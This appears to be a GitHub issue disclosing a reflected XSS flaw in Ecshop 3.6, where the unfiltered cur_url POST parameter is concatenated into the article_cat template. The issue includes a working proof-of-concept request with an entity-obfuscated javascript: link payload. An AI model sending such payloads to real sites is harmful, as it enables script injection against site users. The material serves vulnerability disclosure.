You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Ecshop 3.6 is susceptible to a reflected XSS attack.
The flaw exists due to improper handling and concatenation of user-supplied input in the construction of HTML form elements, leading to potential execution of malicious scripts.
Details
In ecshop/article_cat.php, we can see that the code assigns the value of $_POST['cur_url'] to $search_url, but it is not filtered.
In ecshop/temp/compiled/article_cat.dwt.php, $search_url is directly concatenated into the code, which leads to a reflective XSS vulnerability.
Proof of Concept (POC)
POST /article_cat.php?id=1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 146
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: 192.168.160.158:1042
Connection: Keep-alive
cur_url=http://www.example.com">%3ca%20href%3dj%26%2397v%26%2397script%26%23x3A%3b%26%2397lert(1)%3eClickMe<!--&id=1&keywords=1
The text was updated successfully, but these errors were encountered:
Summary
Ecshop 3.6 is susceptible to a reflected XSS attack.
The flaw exists due to improper handling and concatenation of user-supplied input in the construction of HTML form elements, leading to potential execution of malicious scripts.
Details
In
ecshop/article_cat.php, we can see that the code assigns the value of$_POST['cur_url']to$search_url, but it is not filtered.In
ecshop/temp/compiled/article_cat.dwt.php,$search_urlis directly concatenated into the code, which leads to a reflective XSS vulnerability.Proof of Concept (POC)
The text was updated successfully, but these errors were encountered: